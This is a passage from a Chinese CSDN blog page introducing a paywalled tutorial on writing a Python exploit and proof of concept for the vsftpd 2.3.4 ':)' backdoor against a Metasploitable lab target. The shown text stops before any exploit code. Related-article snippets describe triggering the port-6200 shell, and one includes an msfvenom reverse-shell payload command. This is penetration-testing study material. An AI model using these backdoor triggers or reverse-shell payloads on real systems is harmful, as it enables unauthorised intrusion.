Python制作vsftpd2.3.4的exp和poc

最新推荐文章于 2023-11-23 18:02:51 发布
VIP文章 最新推荐文章于 2023-11-23 18:02:51 发布
阅读量313 收藏 1
点赞数
文章标签: python 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiaobaihack_doge/article/details/128984980
版权

文章目录

前言

Python是一门优秀的脚本语言,目前在网络安全领域被广泛使用,一些exp(漏洞利用程序)程序都是由Python做的,本次我们将用Python写一个exp和poc(漏洞验证程序)。
关于vsftpd2.3.4程序,这是一个在Linux上的ftp软件,允许其他设备通过ftp连接,但是这个软件存在一个高危漏洞,当用户名或密码含有:)字样时,会在本机开启一个提供shell的6200端口,因此被称为"笑脸漏洞”。
exploit-db上的exp

一、环境搭建

这里我以metasploitable来作为靶机,这是一个用于渗透测试中作为靶机的Linux系统,存在多个漏洞。
百度网盘下载地址
下载后直接使用VMware打开此虚拟机,默认用户名和密码都是msfadmin

二、分析FTP数据包

我们使用wireshark抓包分析数据包。
wireshark官网下载地址
打开wireshark,双击当前使用的网卡即可开始抓包。

打开cmd命令提示符,输入ftp打开自带的ftp程序
在这里插入图片描述
接着输入open [靶机IP地址]来连接,用户名密码随便输入,我们只做分析。
在这里插入图片描述
然后返回wireshark,在上方的输入框输入ftp,表示只显示ftp数据包。

最低0.47元/天 解锁文章
pyshell
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
vsftpd 2.3.4
12-15
Linux 源代码 编译安装vsftpd-2.3.4 提供开源安全可靠的ftp服务系统 文件夹内有详细教程与配套文件 Linux 源代码 编译安装vsftpd-2.3.4的配置 Linux下FTP服务器vsftp配置大全超完整版 Linux下vsFTP配置全方案(限制...
利用 exploit-db 交叉编译 shellcode
YouTheFreedom的博客
09-22 525
shellcode 通用编写方法 获得shellcode一般有如下五种办法: pwntools: asm(shellcraft.arm.linux.sh(),arch=’arm’) msfvenom: msfvenom -p linux/armle/shell/reverse_tcp LHOST=192.168.1.100 LPORT=6666 -f py -o msf.py shell-storm: http://shell-storm.org/shellcode/ exploit-db: https
vsftpd实现Python隐式访问的配置
zl498380233的博客
09-23 312
vsftpd.conf添加下列配置: ssl_enable=YES allow_anon_ssl=NO force_local_data_ssl=YES force_local_logins_ssl=YES ssl_tlsv1=YES ssl_sslv2=YES ssl_sslv3=YES rsa_cert_file=/home/ftp/myftp01/vsftpd.pem #生成的证书 ssl_ciphers=HIGH implicit_ssl=YES listen_port=990 #命令连接接口
Vsftpd2.3.4后门利用脚本编写
gugonggugong的博客
01-31 554
一、漏洞介绍 该版本的 VSFTPD 存在一个后门漏洞。虽然该问题迅速得到了开发人员的修复及删除,但是仍有不少人已经下载安装了该漏洞版本。这个后门的载荷以 :)字符的形式拼接在用户名上。后门代码绑定的侦听端口是 6200 。 二、漏洞复现 Linux源代码安装Vsftpd2.3.4: wgethttp://xiazai.xiazaiba.com/Soft/V/vsftpd-2.3.4.tar.gz #下载安装包 tarzxvf...
python实现定制EXP
weixin_51693574的博客
01-31 914
python实现定制EXP 一、POCEXP 四个常见概念: POC:(Proof of Concept)概念验证,常指一段漏洞证明的代码。 作用:用来证明漏洞存在的(无害的) EXP:(Exploit)利用,指利用系统漏洞进行攻击的动作。 作用:用来利用漏洞的(有害的) Payload:(攻击载荷,指成功exploit之后,真正在目标系统执行的代码或指令。 Shellcode:Payload的一种,由于其建立正向/反向shell而得名。 一个形象的比喻: 想象自己是特工,你目标是监控一个重要的
vsftpd 2.3.4 带漏洞版本 可复现
09-26
vsftpd 2.3.4 带笑脸漏洞版本 可复现
vsftpd_2.3.4.zip
12-28
vsftpd2.3.4版本,含笑脸漏洞。
网络安全 批量执行vsftpd2.3.4漏洞
04-21
可以批量执行笑脸漏洞,支持多线程
Linux 源代码 编译安装vsftpd-2.3.4
03-19
Linux 源代码 编译安装vsftpd-2.3.4,提供开源安全可靠的ftp服务系统,是你搭载ftp的不二之选
vsftp234--POC.py
04-03
该版本的 VSFTPD 存在一个后门漏洞。虽然该问题迅速得到了开发人员的修复及删除,但是仍有不少人已经下载安装了该漏洞版本。这个后门的载荷以 :)字符的形式拼接在用户名上。后门代码绑定的侦听端口是 6200 。
python 脚本实现ftp--expect
weixin_34190136的博客
05-07 120
#!/usr/bin/env python import pexpect child = pexpect.spawn ('ftp *.*.*.*') child.expect ('Name .*: ') child.sendline ('user') child.expect ('Password:') child.sendline ('****') child.expect...
vsftpd_234漏洞利用
echoonly1999的博客
03-08 4628
vsftpd漏洞利用 sybg写着不合心意,在这里记录下(划掉) 分为三部分: 1. vsftp服务 2 .漏洞代码 3.漏洞利用的两种方式 vsftp服务 (Metasploitable2使用指南) Metasploitable2在21端口上运行着vsftpd服务,一个使用广泛的FTP服务。这个特别的版本包含一个后门允许一个未知的入侵者进入核心代码。这个后门很快就被确认并且移除。但是移除之前已经...
FTP(匿名登录)未授权访问VSFTPD2.3.4漏洞渗透
weixin_52347768的博客
05-05 8751
漏洞扫描考察论文
python vsftp mysql_vsftp需求
weixin_32513585的博客
02-03 165
真的真的好久没写博客啦~~!还好最近一个视频直播的项目上线了。恶心的调试,这个vsftp需求更恶心了我!下面是产品的需求:1、总部人员需要通过ftp上传课件到服务器上。权限只能是创建目录、上传文件、禁止下载文件、删除文件、重命名文件。分中心则通过ftp下载课件。权限只能是下载,禁止创建目录、上传文件、删除文件、重命名文件。2、总部人员需要通过ftp将资料上传到服务器上。权限只能是创建目录、上传文件...
vsftpd2.3.4笑脸漏洞
weixin_51909453的博客
11-02 4746
vsftpd2.3.4笑脸漏洞 该版本的 VSFTPD 存在一个后门漏洞。虽然该问题迅速得到了开发人员的修复及删除,但是仍有不少人已经下载安装了该漏洞版本。这个后门的载荷以 :)字符的形式拼接在用户名上。后门代码绑定的侦听端口是 6200 。 1、靶机metasploitable2,默认登录账号和密码都是:msfadmin,登录成功后ifconfig查看靶机ip192.168.179.129 2、打开kali首先输入sudo su ,输入当前用户密码即可切换root,利用nmap -sV 192.168.
VSFTP 2.3.4(笑脸漏洞)漏洞详解
m0_64593235的博客
04-18 1631
VSFTPD 2.3.4(笑脸漏洞)漏洞详解
Vsftpd2.3.4环境搭建-漏洞利用(笑脸漏洞)
qq_34914659的博客
08-09 2915
一、环境搭建 首先,需要找一个漏洞环境,通过fofa搜索"Vsftpd2.3.4",但是没有找到可以利用的环境,于是搭建环境 安装包在csdn上下载,需要50积分 https://download.csdn.net/download/sinat_32937525/11824028 1.靶机环境是centos7 ,首先解压缩包,并上传到靶机目录 tar -zxvf 压缩包名称 2.进入vsftpd目录,赋予文件权限,之后进行make &&a...
ftp2.3.4(笑脸漏洞)
最新发布
lianhe20040122的博客
11-23 240
扫描目标ip,查看是否存在漏洞,出现以下这些就代表存在。进行编译安装,出现以下这些东西,说明安装成功。,打开配置文件把这里修改为。查看是否启动,出现两个。文件,就需要自己创建在。目录下,并赋予执行权限。
漏洞利用 --- VSFTPD 2.3.4 后门
weixin_62443409的博客
06-09 9084
VSFTPD 2.3.4 的攻击就是通过向21端口发送一个特定字节的序列来触发恶意的vsf_sysutil_extra()函数。一旦成功执行,就会在系统的6200端口打开一个后门,从而进行利用。
vsftpd2.3.4下载
09-29
要下载vsftpd2.3.4,您可以按照以下步骤进行操作: 1. 打开您喜欢的网络浏览器,如Chrome,Firefox等。 2. 在搜索引擎中搜索“vsftpd2.3.4下载”,您将找到一些包含下载信息的网站。 3. 点击其中一个可靠的网站...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值